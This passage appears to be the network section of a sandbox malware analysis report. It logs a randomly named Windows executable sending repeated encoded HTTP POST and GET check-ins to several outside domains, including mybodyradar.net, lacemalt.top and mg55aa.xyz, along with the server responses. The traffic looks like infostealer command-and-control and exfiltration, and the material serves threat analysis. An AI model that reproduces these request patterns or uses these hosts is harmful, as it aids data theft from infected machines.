                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          8 | 192.168.2.9 | 49718 | 43.155.26.241 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:16:40.771370888 CEST | 527 | OUT | GET /kwl6/?54D0m=gvohHHH0&mZytyNB=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1EucVb48mJLaeeXAyU/wxkvnKBCdexA== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.cwgehkk.store
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          9 | 192.168.2.9 | 49719 | 3.33.130.190 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:17:07.218585014 CEST | 796 | OUT | POST /nml2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mybodyradar.net
                          Origin: http://www.mybodyradar.net
                          Referer: http://www.mybodyradar.net/nml2/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=KNAkvPqJm3QpzymeC0BXQRSM14V9l2T7wldQ+8blbjTOxrbpqEfWigXluPhqv0Fj4k9epF63QvsJPtXrlLGjlAAZIPd2ZPit7Blg/yY4uGcsEApNs7jOtvii+feaSfoc3pYEJvbqv2Aua/Ew3K1U3FtgHvELAPqpQlxmW4GtaBfDhMjDTTlVKeBT8DRk


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          10 | 192.168.2.9 | 49720 | 3.33.130.190 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:17:09.840500116 CEST | 820 | OUT | POST /nml2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mybodyradar.net
                          Origin: http://www.mybodyradar.net
                          Referer: http://www.mybodyradar.net/nml2/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=KNAkvPqJm3Qp8zWeEXpXFBSP5YV9vWT/wlRQ+9vTbVjOxLrp71fWjgXl6/hjhUFs4kwjpB63Qv4JPtHrm8Sk3gAfDvdwXvit7Blg/ycGuGUsEwZNtePNjPit5feaWfoY3pZRJrbMv14ua+0w3b1X9Ftia/FZO/LZJnhaeKCOCRXTitDdChsOfJB07kYM2nb8dv02dPXifD9GyYyn7A==


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          11 | 192.168.2.9 | 49721 | 3.33.130.190 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:17:12.382019997 CEST | 1833 | OUT | POST /nml2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mybodyradar.net
                          Origin: http://www.mybodyradar.net
                          Referer: http://www.mybodyradar.net/nml2/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          12 | 192.168.2.9 | 49722 | 3.33.130.190 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:17:15.304574013 CEST | 529 | OUT | GET /nml2/?mZytyNB=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKr2X8+FKhtVfu//Txi/xQnlFJmGhF34A==&54D0m=gvohHHH0 HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.mybodyradar.net
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:17:47.252397060 CEST | 394 | IN | HTTP/1.1 200 OK
                          Server: openresty
                          Date: Thu, 18 Jul 2024 06:17:47 GMT
                          Content-Type: text/html
                          Content-Length: 254
                          Connection: close
                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mZytyNB=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKr2X8+FKhtVfu//Txi/xQnlFJmGhF34A==&54D0m=gvohHHH0"}</script></head></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          13 | 192.168.2.9 | 49723 | 203.161.55.102 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:17:52.606554031 CEST | 787 | OUT | POST /tb8p/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lacemalt.top
                          Origin: http://www.lacemalt.top
                          Referer: http://www.lacemalt.top/tb8p/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=nMi0BGwqXNIAZkrTGM9zaJfVGKlg7ApE8e93q6gYYU/PPChcE/UhqISVm7cV/2dUxUBZdrlvG0r9gyVWcDqp0IS3b0aTHe9Zhr3oRcQ24eVL9T3loWqz6bsxuFGZ79CCNFixdupd8PrEA0QXDkDoqkemBZDaleKN1XFwChGTm3uML/g5ENmmng4BrVL9
                          Jul 18, 2024 08:17:53.209460974 CEST | 533 | IN | HTTP/1.1 404 Not Found
                          Date: Thu, 18 Jul 2024 06:17:53 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          14 | 192.168.2.9 | 49724 | 203.161.55.102 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:17:55.148562908 CEST | 811 | OUT | POST /tb8p/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lacemalt.top
                          Origin: http://www.lacemalt.top
                          Referer: http://www.lacemalt.top/tb8p/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=nMi0BGwqXNIAbEbTLOVzP5faLalg0goN8ex3q7lTYGrPOjRcVOUhtISV+rcUyWdfxUMmdpBvG3X9gzlWf02q0YS5QUbVJ+9Zhr3oRc0c4eNL+jHlnXqslrs2+lGZ/9CGNFiXdqhn8KvEA2IXDRvvzUegFZCXivng81YlfC6RnRurB+AnV/v9y34msyCVXzgSM0RvI72/L+us3Em9jQ==
                          Jul 18, 2024 08:17:55.756464005 CEST | 533 | IN | HTTP/1.1 404 Not Found
                          Date: Thu, 18 Jul 2024 06:17:55 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          15 | 192.168.2.9 | 49725 | 203.161.55.102 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:17:57.678827047 CEST | 1824 | OUT | POST /tb8p/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lacemalt.top
                          Origin: http://www.lacemalt.top
                          Referer: http://www.lacemalt.top/tb8p/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:17:58.292809963 CEST | 533 | IN | HTTP/1.1 404 Not Found
                          Date: Thu, 18 Jul 2024 06:17:58 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          16 | 192.168.2.9 | 49726 | 203.161.55.102 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:00.211462021 CEST | 526 | OUT | GET /tb8p/?54D0m=gvohHHH0&mZytyNB=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiIsaScbSWFF5V9pamWb9U32+hQ7ii7xg== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.lacemalt.top
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:18:00.822619915 CEST | 548 | IN | HTTP/1.1 404 Not Found
                          Date: Thu, 18 Jul 2024 06:18:00 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          17 | 192.168.2.9 | 49727 | 108.179.193.98 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:06.178093910 CEST | 814 | OUT | POST /xti2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.siteblogoficialon.com
                          Origin: http://www.siteblogoficialon.com
                          Referer: http://www.siteblogoficialon.com/xti2/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=dDbd7FI+aBuIqEccXXURNSOpWFGY6Dj4Kr3kmNqdtsdGRaqxrLRvRJh8iWPrzr9rHHN2a7KeVG4GN8JaFIN8x26+GRD7Ij4hMtMHLZwKZiwTg+UFC+mJ/g3pnB+aTvk0c5OmIqCKFYGi+9P5GP+3JooLc64bCcymtc3izCEiyC0v/vZzspHNzyUKrDJz
                          Jul 18, 2024 08:18:06.824328899 CEST | 361 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:06 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          X-Redirect-By: WordPress
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Location: https://www.siteblogoficialon.com/xti2/
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          18 | 192.168.2.9 | 49728 | 108.179.193.98 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:08.711636066 CEST | 838 | OUT | POST /xti2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.siteblogoficialon.com
                          Origin: http://www.siteblogoficialon.com
                          Referer: http://www.siteblogoficialon.com/xti2/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=dDbd7FI+aBuIqlscU0MRLyOuZlGYwji/Kr7kmMuNtalGS+mxqJ5vC5h8w2Pu5L9gHHJ+a+qeVGsGN+RaF7V/wm64ShD5HD4hMtMHLaMgZi4TgOkFDaKKhQ3q3R+aXvkwc5PzIrfCFa+i+9/5He+0eYoNWa50GOXomf//u0RAsTk91u5t9bOWmlUtskAbdIn4FfTJRudAkp29lCplpw==
                          Jul 18, 2024 08:18:09.324654102 CEST | 361 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:09 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          X-Redirect-By: WordPress
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Location: https://www.siteblogoficialon.com/xti2/
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          19 | 192.168.2.9 | 49729 | 108.179.193.98 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:11.248905897 CEST | 1851 | OUT | POST /xti2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.siteblogoficialon.com
                          Origin: http://www.siteblogoficialon.com
                          Referer: http://www.siteblogoficialon.com/xti2/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:18:11.881146908 CEST | 361 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:11 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          X-Redirect-By: WordPress
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Location: https://www.siteblogoficialon.com/xti2/
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          20 | 192.168.2.9 | 49730 | 108.179.193.98 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:13.794574976 CEST | 535 | OUT | GET /xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2pFGuXFTeP1snGKodOakbcCZ5ieg/dQ==&54D0m=gvohHHH0 HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.siteblogoficialon.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:18:14.452423096 CEST | 501 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:14 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          X-Redirect-By: WordPress
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Location: https://www.siteblogoficialon.com/xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2pFGuXFTeP1snGKodOakbcCZ5ieg/dQ==&54D0m=gvohHHH0
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          21 | 192.168.2.9 | 49731 | 35.241.34.216 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:36.102586031 CEST | 781 | OUT | POST /7npk/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mg55aa.xyz
                          Origin: http://www.mg55aa.xyz
                          Referer: http://www.mg55aa.xyz/7npk/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=6nJFBUn9Ne3O2lc17zyP4UZfghYdV8QLETaqe5gHaQKRTmsv7Z528o193gJSCEVmkoLZ/whUA2IejlBa5pIiFYzbhEB/5rSfQgDOZVlfh5o9inBEwN080znRnENSiREYxw0RSoZYQAo6BCtXE/Y8MCGLilpBVt8nlWiZGsutlniXB0vJ3Ci2f9QIAKK+
                          Jul 18, 2024 08:18:36.734452963 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                          Server: nginx/1.20.2
                          Date: Thu, 18 Jul 2024 06:18:36 GMT
                          Content-Type: text/html
                          Content-Length: 157
                          Via: 1.1 google
                          Connection: close
                          Jul 18, 2024 08:18:36.737665892 CEST | 157 | IN
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          22 | 192.168.2.9 | 49732 | 35.241.34.216 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:38.635194063 CEST | 805 | OUT | POST /7npk/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mg55aa.xyz
                          Origin: http://www.mg55aa.xyz
                          Referer: http://www.mg55aa.xyz/7npk/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=6nJFBUn9Ne3O3FM15UuP60ZclhYdPMQPETeqe8ZYZi+RUCov6Y529o199AJtfUV9koXr/0hUA2cejg9a5awhEIzV6UB5k7SfQgDOZVx5h4A9jXRE3ZA/+TnOukNSmREcxw0vSpF2QCg6BHRXEr0jGCGN/1oAQtpRpFq6PauXxFq/CVPXmwrtKqQvHtDWbbnxQyvcsjHDucDpbY5HRw==
                          Jul 18, 2024 08:18:39.267457962 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                          Server: nginx/1.20.2
                          Date: Thu, 18 Jul 2024 06:18:39 GMT
                          Content-Type: text/html
                          Content-Length: 157
                          Via: 1.1 google
                          Connection: close
                          Jul 18, 2024 08:18:39.270921946 CEST | 157 | IN
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          23 | 192.168.2.9 | 49733 | 35.241.34.216 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:41.163125038 CEST | 1818 | OUT | POST /7npk/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mg55aa.xyz
                          Origin: http://www.mg55aa.xyz
                          Referer: http://www.mg55aa.xyz/7npk/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:18:41.797302008 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                          Server: nginx/1.20.2
                          Date: Thu, 18 Jul 2024 06:18:41 GMT
                          Content-Type: text/html
                          Content-Length: 157
                          Via: 1.1 google
                          Connection: close
                          Jul 18, 2024 08:18:41.800997019 CEST | 157 | IN
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          24 | 192.168.2.9 | 49734 | 35.241.34.216 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:18:43.710582972 CEST | 524 | OUT | GET /7npk/?54D0m=gvohHHH0&mZytyNB=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MY4r+pCVils+sXQjgc19rp6lijR1H1Q== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.mg55aa.xyz
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:18:44.340939045 CEST | 300 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.2
                          Date: Thu, 18 Jul 2024 06:18:44 GMT
                          Content-Type: text/html
                          Content-Length: 5161
                          Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                          Vary: Accept-Encoding
                          ETag: "65a4939c-1429"
                          Cache-Control: no-cache
                          Accept-Ranges: bytes
                          Via: 1.1 google
                          Connection: close
                          Jul 18, 2024 08:18:44.353832960 CEST | 1236 | IN
                          Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
